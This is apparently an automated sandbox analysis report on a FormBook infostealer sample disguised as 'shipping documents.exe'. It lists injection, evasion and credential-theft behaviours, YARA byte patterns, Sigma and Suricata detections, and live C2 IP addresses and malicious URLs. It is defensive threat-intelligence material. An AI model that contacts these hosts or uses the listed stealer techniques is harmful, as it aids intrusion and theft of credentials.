Edit tour

Windows Analysis Report
shipping documents.exe

Overview

General Information

Sample name:	shipping documents.exe
Analysis ID:	1492009
MD5:	832d7c1846198763310af90dd8c04746
SHA1:	272b18a39bd6c0b459be994c722938ca20138dff
SHA256:	f9fa8f47333b24b20ff9c838d40e58f56c86ec5d9351e38a387bf5eba3356f06
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

shipping documents.exe (PID: 4304 cmdline: "C:\Users\user\Desktop\shipping documents.exe" MD5: 832D7C1846198763310AF90DD8C04746)

svchost.exe (PID: 4832 cmdline: "C:\Users\user\Desktop\shipping documents.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

RxbWnCRczoMimJmDFzH.exe (PID: 7108 cmdline: "C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

clip.exe (PID: 4824 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)

RxbWnCRczoMimJmDFzH.exe (PID: 1520 cmdline: "C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5480 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4517905581.0000000004690000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4517905581.0000000004690000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2275758100.0000000000A00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2275758100.0000000000A00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2282609393.0000000006800000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x11976:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
00000004.00000002.4517774741.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4517774741.0000000002D90000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4516375312.0000000002A00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4516375312.0000000002A00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4517885588.0000000006290000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x11976:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
00000002.00000002.2274836520.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2274836520.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4517885588.0000000005890000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9faee5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2282609393.0000000005E00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9faee5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\shipping documents.exe", CommandLine: "C:\Users\user\Desktop\shipping documents.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\shipping documents.exe", ParentImage: C:\Users\user\Desktop\shipping documents.exe, ParentProcessId: 4304, ParentProcessName: shipping documents.exe, ProcessCommandLine: "C:\Users\user\Desktop\shipping documents.exe", ProcessId: 4832, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\shipping documents.exe", CommandLine: "C:\Users\user\Desktop\shipping documents.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\shipping documents.exe", ParentImage: C:\Users\user\Desktop\shipping documents.exe, ParentProcessId: 4304, ParentProcessName: shipping documents.exe, ProcessCommandLine: "C:\Users\user\Desktop\shipping documents.exe", ProcessId: 4832, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 194.58.112.174

Timestamp:	2024-08-13T06:45:27.053610+0200
SID:	2855464
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 199.192.19.19

Timestamp:	2024-08-13T06:44:51.389961+0200
SID:	2855464
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.5 - Destination IP: 5.44.111.162

Timestamp:	2024-08-13T06:42:36.497567+0200
SID:	2050745
Severity:	1
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.5 - Destination IP: 199.192.19.19

Timestamp:	2024-08-13T06:44:53.856835+0200
SID:	2050745
Severity:	1
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 23.251.54.212

Timestamp:	2024-08-13T06:44:13.088129+0200
SID:	2855464
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.5 - Destination IP: 43.252.167.188

Timestamp:	2024-08-13T06:43:52.517461+0200
SID:	2050745
Severity:	1
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.5 - Destination IP: 208.91.197.27

Timestamp:	2024-08-13T06:43:30.163849+0200
SID:	2050745
Severity:	1
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-08-13T06:45:13.651730+0200
SID:	2855464
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.5 - Destination IP: 217.160.0.106

Timestamp:	2024-08-13T06:42:59.896735+0200
SID:	2050745
Severity:	1
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 213.145.228.16

Timestamp:	2024-08-13T06:44:59.712324+0200
SID:	2855464
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.5 - Destination IP: 194.58.112.174

Timestamp:	2024-08-13T06:45:34.777244+0200
SID:	2050745
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 208.91.197.27

Timestamp:	2024-08-13T06:43:22.028285+0200
SID:	2855464
Severity:	1
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 194.58.112.174

Timestamp:	2024-08-13T06:45:32.151383+0200
SID:	2855464
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 213.145.228.16

Timestamp:	2024-08-13T06:45:02.286411+0200
SID:	2855464
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 194.9.94.85

Timestamp:	2024-08-13T06:43:58.536135+0200
SID:	2855464
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 208.91.197.27

Timestamp:	2024-08-13T06:43:27.071473+0200
SID:	2855464
Severity:	1
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 172.67.210.102

Timestamp:	2024-08-13T06:45:41.338068+0200
SID:	2855464
Severity:	1
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 194.9.94.85

Timestamp:	2024-08-13T06:44:00.865225+0200
SID:	2855464
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 43.252.167.188

Timestamp:	2024-08-13T06:43:47.445622+0200
SID:	2855464
Severity:	1
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 194.58.112.174

Timestamp:	2024-08-13T06:45:29.592116+0200
SID:	2855464
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 217.160.0.106

Timestamp:	2024-08-13T06:42:57.360686+0200
SID:	2855464
Severity:	1
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.5 - Destination IP: 194.9.94.85

Timestamp:	2024-08-13T06:44:05.920117+0200
SID:	2050745
Severity:	1
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 213.145.228.16

Timestamp:	2024-08-13T06:45:04.824823+0200
SID:	2855464
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 43.252.167.188

Timestamp:	2024-08-13T06:43:44.909839+0200
SID:	2855464
Severity:	1
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 23.251.54.212

Timestamp:	2024-08-13T06:44:15.619420+0200
SID:	2855464
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 199.192.19.19

Timestamp:	2024-08-13T06:44:46.208108+0200
SID:	2855464
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 172.67.210.102

Timestamp:	2024-08-13T06:45:46.416615+0200
SID:	2855464
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-08-13T06:45:16.175119+0200
SID:	2855464
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-08-13T06:45:21.239206+0200
SID:	2050745
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 208.91.197.27

Timestamp:	2024-08-13T06:43:24.533484+0200
SID:	2855464
Severity:	1
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 23.251.54.212

Timestamp:	2024-08-13T06:44:18.151077+0200
SID:	2855464
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.5 - Destination IP: 172.67.210.102

Timestamp:	2024-08-13T06:41:56.947367+0200
SID:	2050745
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 43.252.167.188

Timestamp:	2024-08-13T06:43:49.962108+0200
SID:	2855464
Severity:	1
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 217.160.0.106

Timestamp:	2024-08-13T06:42:54.860572+0200
SID:	2855464
Severity:	1
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 217.160.0.106

Timestamp:	2024-08-13T06:42:52.310484+0200
SID:	2855464
Severity:	1
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 172.67.210.102

Timestamp:	2024-08-13T06:45:43.869377+0200
SID:	2855464
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 199.192.19.19

Timestamp:	2024-08-13T06:44:48.742452+0200
SID:	2855464
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.5 - Destination IP: 213.145.228.16

Timestamp:	2024-08-13T06:45:07.934243+0200
SID:	2050745
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.5 - Destination IP: 23.251.54.212

Timestamp:	2024-08-13T06:44:40.560837+0200
SID:	2050745
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 91.195.240.19

Timestamp:	2024-08-13T06:45:18.734659+0200
SID:	2855464
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 194.9.94.85

Timestamp:	2024-08-13T06:44:03.377096+0200
SID:	2855464
Severity:	1
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.sandranoll.com/aroo/	Avira URL Cloud: Label: malware
Source: http://www.xn--matfrmn-jxa4m.se/4hda/	Avira URL Cloud: Label: malware
Source: http://www.xn--matfrmn-jxa4m.se/4hda/?jN=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG94cDJ5htquBO11HcjCOymydCfo0q1+e/CBcncmTCUQD5IVA==&uXTT=8FDHY8dP	Avira URL Cloud: Label: malware
Source: http://www.sandranoll.com/aroo/?uXTT=8FDHY8dP&jN=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ==	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.sandranoll.com	Virustotal: Detection: 10%			Perma Link
Source: www.anuts.top	Virustotal: Detection: 7%			Perma Link

Multi AV Scanner detection for submitted file

Source: shipping documents.exe	ReversingLabs: Detection: 39%
Source: shipping documents.exe	Virustotal: Detection: 28%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4517905581.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2275758100.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4517774741.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4516375312.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2274836520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: shipping documents.exe

Joe Sandbox ML: detected

Source: shipping documents.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RxbWnCRczoMimJmDFzH.exe, 00000003.00000000.2193895263.000000000002E000.00000002.00000001.01000000.00000004.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000000.2351445535.000000000002E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: shipping documents.exe, 00000000.00000003.2066595265.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, shipping documents.exe, 00000000.00000003.2066839742.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2177096394.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275990809.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275990809.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179143443.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2283344718.000000000474D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2274650593.0000000004597000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4518128097.0000000004900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4518128097.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: shipping documents.exe, 00000000.00000003.2066595265.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, shipping documents.exe, 00000000.00000003.2066839742.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2177096394.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275990809.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275990809.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179143443.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2283344718.000000000474D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2274650593.0000000004597000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4518128097.0000000004900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4518128097.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: clip.pdb source: svchost.exe, 00000002.00000002.2275553960.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2242514540.000000000081A000.00000004.00000020.00020000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000003.00000003.2213216681.00000000015C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: clip.exe, 00000004.00000002.4519037536.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4516518251.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000000.2353132572.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2573613752.000000001354C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: clip.exe, 00000004.00000002.4519037536.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4516518251.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000000.2353132572.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2573613752.000000001354C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000002.2275553960.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2242514540.000000000081A000.00000004.00000020.00020000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000003.00000003.2213216681.00000000015C4000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006B4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_006B4696
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BC93C FindFirstFileW,FindClose,	0_2_006BC93C
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_006BC9C7
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006BF200
